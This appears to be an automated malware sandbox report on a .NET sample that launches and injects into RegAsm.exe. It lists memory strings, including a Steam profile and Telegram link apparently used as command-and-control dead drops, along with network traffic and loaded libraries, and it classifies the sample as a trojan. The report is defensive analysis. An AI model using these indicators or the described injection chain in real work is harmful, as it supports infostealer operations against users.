                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                      Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://help.steampowered.com/en/
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/discussions/
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/market/
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                      Source: file.exe, 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2185117153.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869H
                      Source: file.exe, 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/workshop/
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/about/
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/explore/
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/legal/
                      Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/mobile
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/news/
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/points/shop/
                      Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privac
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                      Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/stats/
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                      Source: file.exe, 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                      Source: file.exeString found in binary or memory: https://www.entrust.net/rpa0
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49740 version: TLS 1.2

                      System Summary

                      barindex
                      Source: file.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 393216
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02330C400_2_02330C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042D9333_2_0042D933
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042D1C33_2_0042D1C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C4723_2_0041C472
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042D5613_2_0042D561
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041950A3_2_0041950A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042DD1B3_2_0042DD1B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042CD2E3_2_0042CD2E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041B7123_2_0041B712
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004047E8 appears 38 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00410609 appears 71 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004104E7 appears 36 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 2188
                      Source: file.exeStatic PE information: invalid certificate
                      Source: file.exe, 00000000.00000002.1773322212.000000000076E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                      Source: file.exeBinary or memory string: OriginalFilenameVQP.exeD vs file.exe
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@7/9@1/2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004114A5 LdrInitializeThunk,CreateToolhelp32Snapshot,Process32First,Process32Next,3_2_004114A5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,VariantClear,3_2_00411807
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5676
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 2188
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\rje\tg\jv2je3\obj\Release\ojc.pdb source: file.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042582E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0042582E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042F142 push ecx; ret 3_2_0042F155
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00422D3B push esi; ret 3_2_00422D3D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041DDB5 push ecx; ret 3_2_0041DDC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00432715 push 0000004Ch; iretd 3_2_00432726
                      Source: file.exeStatic PE information: section name: .text entropy: 7.995811814167676
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
